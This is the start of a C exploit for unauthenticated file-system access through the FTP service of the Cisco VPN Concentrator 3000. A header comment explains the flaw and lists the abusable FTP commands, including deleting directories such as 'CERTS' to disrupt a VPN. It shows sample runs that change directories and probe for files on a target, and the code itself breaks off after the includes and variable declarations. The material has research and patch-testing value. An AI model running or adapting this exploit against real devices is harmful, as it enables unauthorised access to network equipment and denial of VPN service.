1 /* Cisco VPN Concentrator 3000 FTP remote exploit
2 * ==============================================
3 * A vulnerability exists in the Cisco VPN Concentrator 3000,
4 * an unauthenticated user may access the file system through
5 * manipulation of FTP service commands. An unauthenticated
6 * user can use the following commands;
7 *
8 * CWD − Change the current working directory
9 * MKD − Make a directory within the current working directory
10 * CDUP − Change directory up one tree.
11 * RNFR − Rename From (This can be used to identify files and directories)
12 * SIZE − This can be used to identify files and directories
13 * RMD − This can be used to delete a directory
14 *
15 * The FTP service remembers the current working directory so directory
16 * changes can affect exploitation. By removing potentially sensitive
17 * directories such as "CERTS" it may be possible to disrupt service
18 * to a VPN.
19 *
20 * Confirmed Vulnerable
21 * + Cisco Systems Inc./VPN 3000 concentrator Version 4.1.5 RelJun 18 2004
22 *
23 * Example.
24 * localhost exploits # ./prdelka−vs−CISCO−vpnftp −s 10.1.2.10 −c /
25 * [ Cisco VPN Concentrator 3000 FTP service exploit
26 * [ Connected to 10.1.2.10 (21/tcp)
27 * [ Changing directory to /
28 * [ Success! changed directory to /
29 * localhost exploits # ./prdelka−vs−CISCO−vpnftp −s 10.1.2.10 −t config
30 * [ Cisco VPN Concentrator 3000 FTP service exploit
31 * [ Connected to 10.1.2.10 (21/tcp)
32 * [ Testing for the existance of config
33 * [ Success! file config does exist!
34 *
35 *
36 * − prdelka
37 */
38 #include <sys/types.h>
39 #include <sys/socket.h>
40 #include <netinet/in.h>
41 #include <arpa/inet.h>
42 #include <netdb.h>
43 #include <stdio.h>
44 #include <unistd.h>
45 #include <stdlib.h>
46 #include <getopt.h>
47 #include <signal.h>
48
49 int main (int argc, char *argv[]){
50
int ihost=0,index=0,imkdir=0,ichdir=0,idelete=0,itest=0,ipass=0,port=21;
51
int c, sd, rc, size;
52
char *host, *directory, *file, *buffer, *rbuffer;
Page 1/